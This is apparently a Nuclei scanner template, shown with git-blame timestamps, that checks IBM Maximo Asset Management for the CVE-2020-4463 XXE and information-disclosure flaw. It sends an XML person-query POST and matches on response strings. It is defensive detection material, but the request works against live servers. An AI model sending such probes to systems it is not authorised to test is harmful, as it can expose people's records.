2021-01-02 04:56:15 +00:00
|
|
|
id: CVE-2020-4463
|
2020-12-07 07:59:25 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: IBM Maximo Asset Management Information Disclosure via XXE
|
|
|
|
author: dwisiswant0
|
|
|
|
severity: high
|
|
|
|
description: |
|
|
|
|
IBM Maximo Asset Management is vulnerable to an
|
|
|
|
XML External Entity Injection (XXE) attack when processing XML data.
|
|
|
|
A remote attacker could exploit this vulnerability to expose
|
|
|
|
sensitive information or consume memory resources.
|
|
|
|
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2020-12-07 07:59:25 +00:00
|
|
|
- https://www.ibm.com/support/pages/security-bulletin-ibm-maximo-asset-management-vulnerable-information-disclosure-cve-2020-4463
|
|
|
|
- https://github.com/Ibonok/CVE-2020-4463
|
2021-02-05 19:44:41 +00:00
|
|
|
tags: cve,cve2020,ibm,xxe
|
2020-12-07 15:00:11 +00:00
|
|
|
|
2020-12-07 07:59:25 +00:00
|
|
|
requests:
|
|
|
|
- method: POST
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/os/mxperson"
|
|
|
|
- "{{BaseURL}}/meaweb/os/mxperson"
|
|
|
|
body: |
|
|
|
|
<?xml version='1.0' encoding='UTF-8'?>
|
|
|
|
<max:QueryMXPERSON xmlns:max='http://www.ibm.com/maximo'>
|
|
|
|
<max:MXPERSONQuery></max:MXPERSONQuery>
|
|
|
|
</max:QueryMXPERSON>
|
|
|
|
headers:
|
|
|
|
Content-Type: application/xml
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "application/xml"
|
|
|
|
part: header
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "QueryMXPERSONResponse"
|
|
|
|
- "MXPERSONSet"
|
|
|
|
part: body
|